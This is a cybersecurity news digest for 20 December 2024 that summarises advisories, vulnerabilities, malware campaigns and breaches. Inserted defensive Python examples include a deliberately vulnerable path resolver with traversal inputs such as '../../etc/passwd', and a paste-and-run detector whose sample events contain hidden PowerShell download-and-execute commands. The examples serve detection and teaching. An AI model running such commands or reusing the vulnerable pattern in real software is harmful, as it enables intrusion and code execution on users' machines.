Cyber Threat Intelligence 20 December 2024
Healthcare Sector
- Ossur Mobile Logic Application
"Successful exploitation of these vulnerabilities could allow an attacker unauthorized access to sensitive information."
https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-354-01
Industrial Sector
- Delta Electronics DTM Soft
"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code."
https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-03
- Siemens User Management Component
"Successful exploitation of this vulnerability could allow an unauthenticated remote attacker arbitrary code execution."
https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-04
- Tibbo AggreGate Network Manager
"Successful exploitation of this vulnerability could allow an attacker to achieve code execution on the affected device."
https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-05
- Hitachi Energy RTU500 Series CMU
"Successful exploitation of this vulnerability could allow an attacker to cause a denial-of-service condition."
https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-01
- Hitachi Energy SDM600
"Successful exploitation of these vulnerabilities could allow an attacker to escalate privileges and access sensitive information."
https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-02
- Schneider Electric Accutech Manager
"Successful exploitation could allow an attacker to cause a crash of the Accutech Manager when receiving a specially crafted request over port 2536/TCP."
https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-06
- Schneider Electric Modicon Controllers
"Successful exploitation of this vulnerability could allow an attacker to cause a victim's browser to run arbitrary JavaScript when visiting a page containing injected payload."
https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-07
Vulnerabilities
- Fortinet Warns Of FortiWLM Bug Giving Hackers Admin Privileges
"Fortinet has disclosed a critical vulnerability in Fortinet Wireless Manager (FortiWLM) that allows remote attackers to take over devices by executing unauthorized code or commands through specially crafted web requests. FortiWLM is a centralized management tool for monitoring, managing, and optimizing wireless networks. It's used by government agencies, healthcare organizations, educational institutions, and large enterprises. The flaw, tracked as CVE-2023-34990, is a relative path traversal flaw rated with a score of 9.8."
https://www.bleepingcomputer.com/news/security/fortinet-warns-of-critical-fortiwlm-bug-giving-hackers-admin-privileges/
https://www.darkreading.com/vulnerabilities-threats/fortinet-addresses-unpatched-critical-rce-vector
https://thehackernews.com/2024/12/fortinet-warns-of-critical-fortiwlm.html
https://www.securityweek.com/fortinet-patches-critical-fortiwlm-vulnerability/
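The FortiWLM item above describes the bug class only as a relative path traversal. The following is an added example, not Fortinet or FortiWLM code and not derived from the advisory: it shows the generic shape of that bug beside a resolver that rejects it, using a hypothetical document root `/var/www/data` and constructed sample paths.

```python
# Added example (not FortiWLM or Fortinet code): the generic shape of a relative
# path traversal bug, beside a resolver that rejects it.
import posixpath
from typing import Optional
from urllib.parse import unquote

BASE_DIR = "/var/www/data"  # hypothetical document root served to clients


def vulnerable_resolve(user_path: str) -> str:
    """The classic bug: the client-supplied path is joined onto the base
    directory with no normalisation or containment check. "../../etc/passwd"
    walks out of BASE_DIR, and an absolute path discards BASE_DIR entirely."""
    return posixpath.join(BASE_DIR, user_path)


def safe_resolve(user_path: str) -> Optional[str]:
    """Decode, normalise, then prove the result still lives under BASE_DIR.
    Returns None for anything that escapes."""
    # Decode twice so double-encoded dots (%252e%252e) cannot slip past a
    # single-pass filter; the normalisation below sees the real characters.
    decoded = unquote(unquote(user_path))
    if "\x00" in decoded:
        return None  # a NUL can truncate the path in C-backed file APIs
    # Always treat the input as relative: strip leading slashes so an absolute
    # path cannot replace BASE_DIR, then collapse every "." and ".." segment.
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, decoded.lstrip("/")))
    # Containment check on the normalised string, never on the raw input.
    if candidate != BASE_DIR and not candidate.startswith(BASE_DIR + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests, from benign to classic bypass attempts.
    for p in ["logs/app.log", "reports/../logs/app.log", "../../etc/passwd",
              "%2e%2e/%2e%2e/etc/passwd", "%252e%252e%252fetc%252fpasswd",
              "/etc/passwd"]:
        print(f"{p!r:36} vulnerable={vulnerable_resolve(p)!r:34} safe={safe_resolve(p)!r}")
```

On a real filesystem, follow the string check with `os.path.realpath` so a symlink planted inside the base directory cannot point back out; `posixpath` is used here so the demonstration behaves identically on any host.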
https://securityaffairs.com/172144/hacking/fortinet-warns-of-a-patched-fortiwlm-vulnerability.html
- CISA Adds One Known Exploited Vulnerability To Catalog
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
CVE-2024-12356 BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) Command Injection Vulnerability"
https://www.cisa.gov/news-events/alerts/2024/12/19/cisa-adds-one-known-exploited-vulnerability-catalog
- Acrobat Out-Of-Bounds And Foxit Use-After-Free PDF Reader Vulnerabilities Found
"Cisco Talos’ Vulnerability Research team recently disclosed three out-of-bounds read vulnerabilities in Adobe Acrobat Reader, and two use-after-free vulnerabilities in Foxit Reader. These vulnerabilities exist in Adobe Acrobat Reader and Foxit Reader, two of the most popular and feature-rich PDF readers on the market. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. Adobe patched this in version 24.005.20320, and Foxit's patch appears in PDF Editor version 12.1.9/11.2.12."
https://blog.talosintelligence.com/acrobat-out-of-bounds-and-foxit-use-after-free-pdf-reader-vulnerabilities-found/
- Exploring Vulnerable Windows Drivers
"This post is the result of research into the real-world application of the Bring Your Own Vulnerable Driver (BYOVD) technique along with Cisco Talos’ series of posts about malicious Windows drivers. Some of this research was presented at the AVAR conference in Chennai at the beginning of December 2024. We would like to send a special thanks to Connor McGarr, Russell Sanford, Ryan Warns, Tim Harrison and Michal Poslušný for their previous work on analyzing vulnerabilities in drivers."
https://blog.talosintelligence.com/exploring-vulnerable-windows-drivers/
- Exploiting Trusted Systems: How Adversarial Attacks Can Manipulate EPSS
"In an era where cyber threats are growing in both volume and sophistication, risk management has become a cornerstone of effective organizational defense. Risk management involves identifying, assessing, and prioritizing potential threats, enabling organizations to allocate their resources where they matter most. The ultimate goal is to minimize potential losses while maintaining business continuity and operational resilience."
https://blog.morphisec.com/exploiting-trusted-systems-how-adversarial-attacks-can-manipulate-epss
https://www.infosecurity-magazine.com/news/epss-exposed-to-adversarial-attack/
Malware
- Python-Based NodeStealer Version Targets Facebook Ads Manager
"The updated version of NodeStealer, initially identified in 2023 as a JavaScript-based malware, has significantly evolved into a more sophisticated Python-based threat that’s able to extract a broader range of sensitive data from victims: This advanced variant of NodeStealer not only harvests credit card details and browser-stored information, but also targets Facebook Ads Manager accounts, siphoning critical financial and business data. Facebook Ads Manager, widely used by businesses and individuals to create, manage, and analyze advertising campaigns across various platforms including Facebook, Instagram, Messenger, and the Audience Network, has become a prime target for cybercriminals seeking to exploit sensitive personal and business-related information."
https://www.trendmicro.com/en_us/research/24/l/python-based-nodestealer.html
- BADBOX Botnet Is Back
"Imagine this: you're at home, eagerly waiting for the new device you ordered from Amazon. The package arrives, you power it on, and start enjoying all the benefits of 21st century technology—unaware that, as soon as you powered it on, a scheme was unfolding within this device. Welcome to the world of BADBOX. BADBOX is a large-scale cybercriminal operation selling off-brand Android TV boxes, smartphones, and other Android electronics with preinstalled malware. What does this mean? It means the device is infected before it even reaches your hands."
https://www.bitsight.com/blog/badbox-botnet-back
https://www.bleepingcomputer.com/news/security/badbox-malware-botnet-infects-192-000-android-devices-despite-disruption/
- Juniper Warns Of Mirai Botnet Targeting Session Smart Routers
"Juniper Networks has warned customers of Mirai malware attacks targeting and infecting Session Smart routers using default credentials. As the networking infrastructure company explained, the malware scans for devices with default login credentials and executes commands remotely after gaining access, enabling a wide range of malicious activities."
https://www.bleepingcomputer.com/news/security/juniper-warns-of-mirai-botnet-targeting-session-smart-routers/
https://supportportal.juniper.net/s/article/2024-12-Reference-Advisory-Session-Smart-Router-Mirai-malware-found-on-systems-when-the-default-password-remains-unchanged?language=en_US
https://therecord.media/routers-with-default-passwords-mirai-malware-juniper
https://thehackernews.com/2024/12/juniper-warns-of-mirai-botnet-targeting.html
https://www.securityweek.com/juniper-warns-of-mirai-botnet-targeting-session-smart-routers/
https://securityaffairs.com/172157/malware/juniper-networks-mirai-botnet.html
- Chinese Cyber Center Points Finger At U.S. Over Alleged Cyberattacks To Steal Trade Secrets
"China’s national cyber incident response center accused the U.S. government of launching cyberattacks against two Chinese tech companies in a bid to steal trade secrets. In a notice Wednesday, the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT) said a suspected U.S. intelligence agency was behind the attacks, and that CNCERT had “handled” them, according to a Google translation."
https://cyberscoop.com/chinese-cyber-center-us-alleged-cyberattacks-trade-secrets/
- ICS Threat Analysis: New, Experimental Malware Can Kill Engineering Processes
"Our analysis of a public malware repository shows a constant drumbeat of OT/ICS malware. Since +20% of all OT/ICS attacks target engineering workstations, we focused on it. We saw 2 incidents with Mitsubishi engineering workstations infected with Ramnit worm. We analyzed 3 samples of new malware that kills Siemens engineering processes —we’ve named it Chaya_003."
https://www.forescout.com/blog/ics-threat-analysis-new-experimental-malware-can-kill-engineering-processes/
https://www.darkreading.com/vulnerabilities-threats/ot-ics-engineering-workstations-malware
https://www.infosecurity-magazine.com/news/malware-engineering-ics/
- Mobile Spear Phishing Targets Executive Teams
"In an increasingly complex threat landscape, sophisticated mobile-targeted phishing campaigns continue to evolve, leveraging multiple redirection techniques and platform-specific behaviors to evade detection. Spear phishing, a highly targeted form of social engineering, is a preferred attack vector against corporate executives, specifically designed to compromise high-value credentials that grant access to sensitive enterprise data and systems."
https://www.zimperium.com/blog/mobile-spear-phishing-targets-executive-teams/
https://hackread.com/mobile-phishing-executives-fake-docusign-links/
- ‘Fix It’ Social-Engineering Scheme Impersonates Several Brands
"More and more, threat actors are leveraging the browser to deliver malware in ways that can evade detection from antivirus programs. Social engineering is a core part of these schemes and the tricks we see are sometimes very clever. Case in point, there has been an increase in attacks that involve copying a malicious command into the clipboard, only to be later pasted and executed by the victims themselves. Who would have thought that copy/paste could be so dangerous?"
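The paste-and-run pattern described above leaves a distinctive trace: a shell started by the user's own explorer.exe (the Run dialog or address bar) with an encoded, hidden or download-and-execute command line. The following detection logic is an added example, not code from the Malwarebytes post; it runs over constructed Sysmon-style process-creation events (JSON lines using the Event ID 1 field names Image, ParentImage, CommandLine and ProcessId), with placeholder paths and URLs.

```python
# Added example (not Malwarebytes code): flag shells a user launched by hand
# from the Run dialog with a pasted "fix" command. Input is constructed
# Sysmon-style process-creation events as JSON lines.
import json
import ntpath
import re
from typing import List, Tuple

# A shell whose parent is explorer.exe was started interactively (Win+R, the
# address bar, a double-click), which is exactly how a pasted command runs.
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Traits of copied one-liners: encoded payloads, hidden windows, in-memory
# execution of content fetched from a URL.
SUSPICIOUS = {
    "encoded_command": re.compile(
        r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}"),
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    "invoke_expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "remote_download": re.compile(
        r"(?i)\b(?:downloadstring|invoke-webrequest|iwr|curl|wget|mshta(?:\.exe)?)\b[^|]*https?://"),
}


def score_event(evt: dict) -> List[str]:
    """Return the suspicious traits present, or [] if the event is not an
    interactively launched shell or shows none of them."""
    image = ntpath.basename(evt.get("Image", "")).lower()
    parent = ntpath.basename(evt.get("ParentImage", "")).lower()
    if image not in SHELLS or parent not in INTERACTIVE_PARENTS:
        return []
    cmd = evt.get("CommandLine", "")
    return [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]


def detect(jsonl: str) -> List[Tuple[str, List[str]]]:
    """Scan JSON-lines events; return (ProcessId, reasons) for each hit."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        evt = json.loads(line)
        reasons = score_event(evt)
        if reasons:
            hits.append((evt["ProcessId"], reasons))
    return hits


# Constructed sample events; paths, PIDs and URLs are placeholders.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ProcessId": "4312", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ProcessId": "4320", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://cdn.example.invalid/fix.hta'},
    {"ProcessId": "4333", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users\alice\Documents"},
    {"ProcessId": "4340", "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -NoLogo"},
    {"ProcessId": "4351", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "iex (iwr https://cdn.example.invalid/x -UseBasicParsing)"'},
])

if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS):
        print(pid, reasons)
```

The parent-process condition is what keeps this rule quiet: scheduled tasks and management agents also run encoded PowerShell, but they are not children of explorer.exe, so a hit here means a person typed or pasted the command.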
https://www.malwarebytes.com/blog/news/2024/12/fix-it-social-engineering-scheme-impersonates-several-brands
- Attackers Exploiting a Patched FortiClient EMS Vulnerability In The Wild
"During a recent incident response, Kaspersky’s GERT team identified a set of TTPs and indicators linked to an attacker that infiltrated a company’s networks by targeting a Fortinet vulnerability for which a patch was already available. This vulnerability is an improper filtering of SQL command input making the system susceptible to an SQL injection. It specifically affects Fortinet FortiClient EMS versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2. When successfully exploited, this vulnerability allows attackers to execute unauthorized code or commands by sending specially crafted data packets."
https://securelist.com/patched-forticlient-ems-vulnerability-exploited-in-the-wild/115046/
- Lazarus Group Evolves Its Infection Chain With Old And New Malware
"Over the past few years, the Lazarus group has been distributing its malicious software by exploiting fake job opportunities targeting employees in various industries, including defense, aerospace, cryptocurrency, and other global sectors. This attack campaign is called the DeathNote campaign and is also referred to as “Operation DreamJob”. We have previously published the history of this campaign. Recently, we observed a similar attack in which the Lazarus group delivered archive files containing malicious files to at least two employees associated with the same nuclear-related organization over the course of one month."
https://securelist.com/lazarus-new-malware/115059/
- Counterfeit ESLint And Node 'types' Libraries Downloaded Thousands Of Times Abuse Pastebin
"The legitimate ESLint packages on the npmjs.com registry are called "typescript-eslint" and "@typescript-eslint/eslint-plugin." This has unscrupulous actors publishing a typosquat named "@typescript_eslinter/eslint" that very closely resembles the names of the real libraries, but is up to no good. The counterfeit component has been downloaded thousands of times. Similarly, attacks impersonated another popular npm package "@types/node" with its counterfeit version having scored 6,765 weekly downloads with 20,502 downloads over the course of its lifetime."
https://www.sonatype.com/blog/counterfeit-eslint-and-node-types-libraries-downloaded-thousands-of-times-abuse-pastebin
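The typosquat in the item above works by mangling the scope ("@typescript_eslinter" for "@typescript-eslint"). A dependency check that catches that kind of imitation, added here as an example and not Sonatype's tooling: it compares every name in a constructed package.json against a hypothetical allowlist of well-known packages, folding the separators squatters swap and measuring edit distance on the scope or the bare name. "@typescript_eslinter/eslint" is the counterfeit named in the item; "@typse/node", "types-node" and "my-internal-widget" are invented for the demonstration.

```python
# Added example (not Sonatype tooling): flag npm dependency names that imitate
# well-known packages, including the scope mangling seen in the item above.
import json
import re
from typing import Dict, Optional, Tuple

# Constructed allowlist. In practice feed this from an internal registry mirror
# or the names already present in your lockfile history.
KNOWN_PACKAGES = [
    "@typescript-eslint/eslint-plugin",
    "@typescript-eslint/parser",
    "typescript-eslint",
    "@types/node",
    "eslint",
    "lodash",
    "express",
]


def split_name(name: str) -> Tuple[Optional[str], str]:
    """'@scope/pkg' -> ('scope', 'pkg'); 'pkg' -> (None, 'pkg')."""
    if name.startswith("@") and "/" in name:
        scope, bare = name[1:].split("/", 1)
        return scope, bare
    return None, name


def normalize(s: str) -> str:
    """Fold the separators squatters swap (_ . -) so 'typescript_eslinter'
    and 'typescript-eslinter' compare as the same string."""
    return re.sub(r"[._-]+", "-", s.lower())


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_dependency(name: str, known=KNOWN_PACKAGES,
                     max_dist: int = 2) -> Tuple[str, Optional[str]]:
    """Return ('known' | 'suspicious' | 'unknown', closest known name)."""
    if name in known:
        return "known", name
    scope, bare = split_name(name)
    best: Optional[Tuple[int, str]] = None
    for k in known:
        kscope, kbare = split_name(k)
        if scope is not None:
            if kscope is None:
                continue
            if scope == kscope:
                # Only the scope owner can publish under a real scope, so an
                # unfamiliar name inside a known scope is not a squat.
                return "unknown", None
            # Scope squat: '@typescript_eslinter/...' vs '@typescript-eslint/...'
            d = levenshtein(normalize(scope), normalize(kscope))
        elif kscope is None:
            # Unscoped vs unscoped: 'lodahs' vs 'lodash'
            d = levenshtein(normalize(bare), normalize(kbare))
        else:
            # Unscoped imitation of a scoped package: 'types-node' vs '@types/node'
            d = levenshtein(normalize(bare), normalize(kscope + "-" + kbare))
        if d <= max_dist and (best is None or d < best[0]):
            best = (d, k)
    return ("suspicious", best[1]) if best else ("unknown", None)


def audit_package_json(text: str) -> Dict[str, Tuple[str, Optional[str]]]:
    """Check every dependency and devDependency in a package.json document."""
    pkg = json.loads(text)
    results = {}
    for section in ("dependencies", "devDependencies"):
        for name in pkg.get(section, {}):
            results[name] = check_dependency(name)
    return results


# Constructed package.json; only '@typescript_eslinter/eslint' comes from the item.
SAMPLE_PACKAGE_JSON = json.dumps({
    "dependencies": {
        "express": "^4.19.2",
        "lodash": "^4.17.21",
        "@typescript_eslinter/eslint": "1.0.3",
        "@typse/node": "20.0.1",
        "types-node": "1.0.0",
        "my-internal-widget": "0.4.0",
    }
})

if __name__ == "__main__":
    for dep, (verdict, closest) in audit_package_json(SAMPLE_PACKAGE_JSON).items():
        print(f"{verdict:10} {dep:30} {closest or ''}")
```

An "unknown" verdict is not a pass; it only means the name is neither on the allowlist nor within two edits of something on it, which is the point at which a human or a registry query should look at the package.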
https://thehackernews.com/2024/12/thousands-download-malicious-npm.html
- Sandworm-Linked Hackers Target Users Of Ukraine’s Military App In New Spying Campaign
"Ukrainian soldiers have become the target of a new espionage campaign linked to the notorious Russian state-sponsored threat actor Sandworm, according to a recent report. As part of the operation, the hackers create fraudulent websites that mimic the official page of a Ukrainian military app, Army+, tricking users into downloading an executable file disguised as an app installation package. Army+ has received significant attention from Ukraine’s government recently. The app, introduced earlier this year, aims to digitize bureaucratic tasks for soldiers, such as submitting reports to commanders."
https://therecord.media/ukraine-military-app-espionage-russia-sandworm
https://thehackernews.com/2024/12/uac-0125-abuses-cloudflare-workers-to.html
https://securityaffairs.com/172139/apt/cert-ua-warns-russia-uac-0125-abuses-cloudflare-workers.html
- Security Brief: Threat Actors Gift Holiday Lures To Threat Landscape
"As the holiday season ramps up globally, threat actors have begun to take advantage of people’s desires for deals, jobs, and end of year bonuses. Proofpoint researchers have observed an increase in timely, themed content delivering malware, fraud, and credential phishing campaigns."
https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-gift-holiday-lures-threat-landscape
Breaches/Hacks/Leaks
- Play Ransomware Claims Krispy Kreme Breach, Threatens Data Leak
"Krispy Kreme, the beloved doughnut chain, disclosed a data breach on December 11, 2024, in which its operations across the United States were disrupted. At the time, the identity of the attackers was unknown. However, Hackread.com can now exclusively reveal that the Play Ransomware group, also known as PlayCrypt, has claimed responsibility for the breach. The Play Ransomware group made the announcement earlier today, December 19, via its dark web leak site."
https://hackread.com/play-ransomware-krispy-kreme-breach-data-leak/
General News
- India Sees Surge In API Attacks, Especially In Banking, Utilities
"Cyberattacks targeting India-based organizations continue to double year-over-year, a rate far higher than the global average, highlighting the rapidly rising risk facing companies and government agencies in South Asia. Overall, organizations in India encountered nearly 1.2 billion attacks in the third quarter of 2024, up from about 600 million in the same quarter in 2023, according to a quarterly report published by Indusface, a managed application security provider. Some 377 million denial-of-service (DoS) events and 215 million bot-based requests targeted API services and Web servers utilizing the firm's Web application and API protection (WAAP) service."
https://www.darkreading.com/cyber-risk/india-surge-api-attacks-banking-utilities
- Are Threat Feeds Masking Your Biggest Security Blind Spot?
"Security teams that subscribe to threat feeds get lists of known malicious domains, IPs, and file signatures that they can leverage to blacklist and prevent attacks from those sources. Using network traffic analysis that recognizes suspicious communications, data breach reports that identify attack techniques, decoys designed to draw out and study attacks, monitoring of attacker forums, and third-party data research, security experts compile threat feeds as actionable portraits of the threat landscape."
https://www.helpnetsecurity.com/2024/12/19/threat-feeds/
- Leadership Skills For Managing Cybersecurity During Digital Transformation
"In this Help Net Security interview, Dan Lohrmann, CISO at Presidio, discusses the need for organizations to rethink their leadership and operational strategies and the cybersecurity risks they have to deal with during digital transformation."
https://www.helpnetsecurity.com/2024/12/19/dan-lohrmann-presidio-digital-transformation-risks/
- Silent Heists: The Danger Of Insider Threats
"When thinking about cybersecurity, we envision malicious actors working in dark basements, honing their tools to invent cunning new ways to breach our defenses. While this is a clear and present danger, it's also important to understand that another hazard is lurking much closer to home - the insider threat."
https://www.tripwire.com/state-of-security/insider-threats-root-causes-mitigation-practices
- Supply Chain Risk Mitigation Must Be a Priority In 2025
"Israel's electronic pager attacks targeting Hezbollah in September highlighted the dangerous ramifications of a weaponized supply chain. The attacks, which leveraged remotely detonated explosives hidden inside pager batteries, injured nearly 3,000 people across Lebanon, as a worst-case reminder of the inherent risk that lies within global supply networks."
https://www.darkreading.com/cyberattacks-data-breaches/supply-chain-risk-mitigation-priority-2025
- $2.2 Billion Stolen From Crypto Platforms In 2024, But Hacked Volumes Stagnate Toward Year-End As DPRK Slows Activity Post-July
"Crypto hacking remains a persistent threat, with four years in the past decade individually seeing more than a billion dollars’ worth of crypto stolen (2018, 2021, 2022, and 2023). 2024 marks the fifth year to reach this troubling milestone, highlighting how, as crypto adoption and prices rise, so too does the amount that can be stolen. In 2024, funds stolen increased by approximately 21.07% year-over-year (YoY) to $2.2 billion, and the number of individual hacking incidents increased from 282 in 2023 to 303 in 2024."
https://www.chainalysis.com/blog/crypto-hacking-stolen-funds-2025/
https://therecord.media/cryptocurrency-platforms-2-billion-stolen-2024-chainalysis
https://www.helpnetsecurity.com/2024/12/19/cryptocurrency-hackers-stole-2-2-billion-from-platforms-in-2024/
https://www.infosecurity-magazine.com/news/cryptohackers-steal-22bn-north/
https://www.itnews.com.au/news/losses-from-crypto-hacks-jump-to-us22-billion-in-2024-614016
- US Seeks Extradition Of Alleged LockBit Ransomware Developer From Israel
"The United States is attempting to extradite an Israeli citizen, Rostislav Panev, who is charged with working as a software developer for the LockBit ransomware group. Panev is accused of assisting LockBit between 2019 and 2024, according to the extradition request reported by Ynet news. He was allegedly paid approximately $230,000 in bitcoin to develop tools for LockBit, including one that printed ransom notes from any printers connected to the compromised system."
https://therecord.media/lockbit-suspect-rostislav-panev-us-seeks-extradition-israel
- LABScon24 Replay | The Ransomware Trust Paradox
"In his Keynote talk at LABScon 24, Max Smeets explores how ransomware operators build a unique relationship between themselves and their victims. In contrast to most other threat actors, ransomware operators rely on and leverage public visibility into their activities. Unlike APTs and other threat actors that prize stealth, ransomware gangs seek to publicize their attacks in order to convince future victims that they are trustworthy enough to deliver on their promises – providing a decryptor and deleting stolen data – if paid."
https://www.sentinelone.com/labs/labscon24-replay-the-ransomware-trust-paradox/
- Top 10 Industries Targeted By Threat Actors In 2024
"As cyber threats continue to evolve, threat actors are refining their techniques and focusing on industries that hold valuable information or play critical roles in society. From ransomware attacks paralyzing operations to data breaches compromising millions of individuals, no sector is immune to cyberattacks. Drawing from recent reports and insights, this blog explores the top 10 industries targeted by cybercriminals in 2024 and the measures they can adopt to bolster their defenses."
https://cyble.com/blog/top-10-industries-targeted-by-cybercriminals/
Reference
Electronic Transactions Development Agency (ETDA)